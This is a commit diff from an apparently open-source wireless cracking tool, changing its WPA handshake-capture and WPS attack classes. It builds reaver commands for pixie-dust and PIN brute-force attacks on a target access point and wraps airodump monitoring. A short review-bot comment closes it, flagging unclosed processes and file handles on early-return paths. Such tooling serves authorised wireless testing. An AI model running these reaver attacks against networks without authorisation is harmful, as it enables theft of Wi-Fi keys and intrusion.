Output target info during WPS attacks.

Also using reaver's --no-nacks option
derv82
2017-05-14 15:27:19 -04:00
parent 2726381017
commit 890915b9b3
2 changed files with 238 additions and 212 deletions


@@ -34,13 +34,10 @@ class AttackWPA(Attack):
# First, start Airodump process # First, start Airodump process
with Airodump(channel=self.target.channel, with Airodump(channel=self.target.channel,
target_bssid=self.target.bssid, target_bssid=self.target.bssid,
skip_wash=True,
output_file_prefix='wpa') as airodump: output_file_prefix='wpa') as airodump:
Color.clear_line() Color.clear_line()
Color.pattack("WPA", self.target, "Handshake capture", "Waiting for target to appear...") Color.pattack("WPA", self.target, "Handshake capture", "Waiting for target to appear...")
#Color.p('\r{+} {C}WPA-handshake attack{W}: ')
#Color.p('{O}waiting{W} for target to appear...')
airodump_target = self.wait_for_target(airodump) airodump_target = self.wait_for_target(airodump)
# Get client station MAC addresses # Get client station MAC addresses


@@ -2,6 +2,7 @@
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
from Attack import Attack from Attack import Attack
from Airodump import Airodump
from Color import Color from Color import Color
from Configuration import Configuration from Configuration import Configuration
from CrackResultWPS import CrackResultWPS from CrackResultWPS import CrackResultWPS
@@ -58,26 +59,37 @@ class AttackWPS(Attack):
command = [ command = [
'reaver', 'reaver',
'-i', Configuration.interface, '--interface', Configuration.interface,
'-b', self.target.bssid, '--bssid', self.target.bssid,
'-c', self.target.channel, '--channel', self.target.channel,
'-K', '1', # pixie-dust attack '--pixie-dust', '1', # pixie-dust attack
'--delay', '0',
'--no-nacks',
'--session', '/dev/null', # Don't restart session '--session', '/dev/null', # Don't restart session
'-vv' # (very) verbose '-vv' # (very) verbose
] ]
stdout_write = open(self.stdout_file, 'a') stdout_write = open(self.stdout_file, 'a')
reaver = Process(command, stdout=stdout_write, stderr=Process.devnull()) reaver = Process(command, stdout=stdout_write, stderr=Process.devnull())
pin = None pin = None
step = '0) initializing' step = '0) initializing'
time_since_last_step = 0 time_since_last_step = 0
while True: with Airodump(channel=self.target.channel,
time.sleep(1) target_bssid=self.target.bssid,
skip_wash=False,
output_file_prefix='pixie') as airodump:
Color.clear_line() Color.clear_line()
Color.p('\r{+} {C}WPS pixie-dust attack{W} ') Color.pattack("WPS", self.target, "Pixie Dust", "Waiting for target to appear...")
while True:
try:
airodump_target = self.wait_for_target(airodump)
except Exception as e:
Color.pattack("WPS", self.target, "Pixie-Dust", "{R}failed: {O}%s{W}" % e)
Color.pl("")
return False
stdout_write.flush() stdout_write.flush()
@@ -99,15 +111,21 @@ class AttackWPS(Attack):
if pin and psk and ssid: if pin and psk and ssid:
# We cracked it. # We cracked it.
bssid = self.target.bssid bssid = self.target.bssid
Color.pl('\n\n{+} {G}successfully cracked WPS PIN and PSK{W}\n') Color.clear_line()
Color.pattack("WPS", airodump_target, "Pixie-Dust", "{G}successfully cracked WPS PIN and PSK{W}\n")
self.crack_result = CrackResultWPS(bssid, ssid, pin, psk) self.crack_result = CrackResultWPS(bssid, ssid, pin, psk)
self.crack_result.dump() self.crack_result.dump()
return True return True
else: else:
# Failed to crack, reaver proces ended. # Failed to crack, reaver proces ended.
Color.pl('{R}failed: {O}WPS pin not found{W}') Color.clear_line()
Color.pattack("WPS", airodump_target, "Pixie-Dust", "{R}Failed: {O}WPS PIN not found{W}\n")
return False return False
if 'WPS pin not found' in stdout:
Color.pl('{R}failed: {O}WPS pin not found{W}')
break
last_step = step last_step = step
# Status updates, depending on last line of stdout # Status updates, depending on last line of stdout
if 'Waiting for beacon from' in stdout_last_line: if 'Waiting for beacon from' in stdout_last_line:
@@ -132,10 +150,6 @@ class AttackWPS(Attack):
break break
step = '({C}step -/8{W}) waiting for AP rate limit' step = '({C}step -/8{W}) waiting for AP rate limit'
if 'WPS pin not found' in stdout:
Color.pl('{R}failed: {O}WPS pin not found{W}')
break
if step != last_step: if step != last_step:
# Step changed, reset step timer # Step changed, reset step timer
time_since_last_step = 0 time_since_last_step = 0
@@ -161,9 +175,10 @@ class AttackWPS(Attack):
Color.pl('{R}failed: {O}too many timeouts (%d){W}' % timeout_count) Color.pl('{R}failed: {O}too many timeouts (%d){W}' % timeout_count)
break break
# Display status of Pixie-Dust attack Color.clear_line()
Color.p('{W}%s{W}' % step) Color.pattack("WPS", airodump_target, "Pixie-Dust", step)
time.sleep(1)
continue continue
# Attack failed, already printed reason why # Attack failed, already printed reason why
@@ -182,9 +197,9 @@ class AttackWPS(Attack):
# Start reaver process # Start reaver process
command = [ command = [
'reaver', 'reaver',
'-i', Configuration.interface, '--interface', Configuration.interface,
'-b', self.target.bssid, '--bssid', self.target.bssid,
'-c', self.target.channel, '--channel', self.target.channel,
'--session', '/dev/null', # Don't restart session '--session', '/dev/null', # Don't restart session
'-vv' # verbose '-vv' # verbose
] ]
@@ -197,18 +212,32 @@ class AttackWPS(Attack):
failures = 0 failures = 0
state = 'initializing' state = 'initializing'
with Airodump(channel=self.target.channel,
target_bssid=self.target.bssid,
skip_wash=False,
output_file_prefix='wps') as airodump:
Color.clear_line()
Color.pattack("WPS", self.target, "PIN Attack", "Waiting for target to appear...")
while True: while True:
try:
airodump_target = self.wait_for_target(airodump)
except Exception as e:
Color.pattack("WPS", self.target, "PIN Attack", "{R}failed: {O}%s{W}" % e)
Color.pl("")
return False
time.sleep(1) time.sleep(1)
percent = 100 * float(pin_current) / float(pin_total) percent = 100 * float(pin_current) / float(pin_total)
Color.clear_line() Color.clear_line()
Color.p('\r{+} {C}WPS PIN attack{W} (') status = '{G}%.2f%% done{W}, ' % percent
Color.p('{G}%.2f%% done{W}, ' % percent) status += '{G}%d{W}/{G}%d pins{W}, ' % (pin_current, pin_total)
Color.p('{G}%d{W}/{G}%d pins{W}, ' % (pin_current, pin_total)) status += '{R}%d/%d failures{W}) ' % (failures, Configuration.wps_fail_threshold)
Color.p('{R}%d/%d failures{W}) ' % (failures, \ Color.pattack("WPS", airodump_target, "PIN Attack", status)
Configuration.wps_fail_threshold))
if failures >= Configuration.wps_fail_threshold: if failures >= Configuration.wps_fail_threshold:
Color.pl('{R}failed: {O}too many failures{W}') Color.pattack("WPS", airodump_target, "PIN Attack", '{R}failed: {O}too many failures{W}')
Color.pl("")
break break
# Get output # Get output
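Review bot: The new `except Exception as e:` branch in the pixie-dust loop returns `False` directly while `reaver` and the `stdout_write` handle, both created before the `with Airodump(...)` block, are still live; nothing visible in these hunks stops the process or closes the file on that path, so reaver may keep running after the attack has been reported as failed. The PIN-attack loop in the last hunk has the same early return. If the code after each loop (outside these hunks, past the `# Attack failed, already printed reason why` comment) is what performs the cleanup, `break` instead of `return False` would reach it; otherwise wrap the loop in `try`/`finally` and stop the process and call `stdout_write.close()` there. Catching bare `Exception` also hides programming errors behind a "failed" status line, so narrowing it to what `wait_for_target` actually raises would be safer.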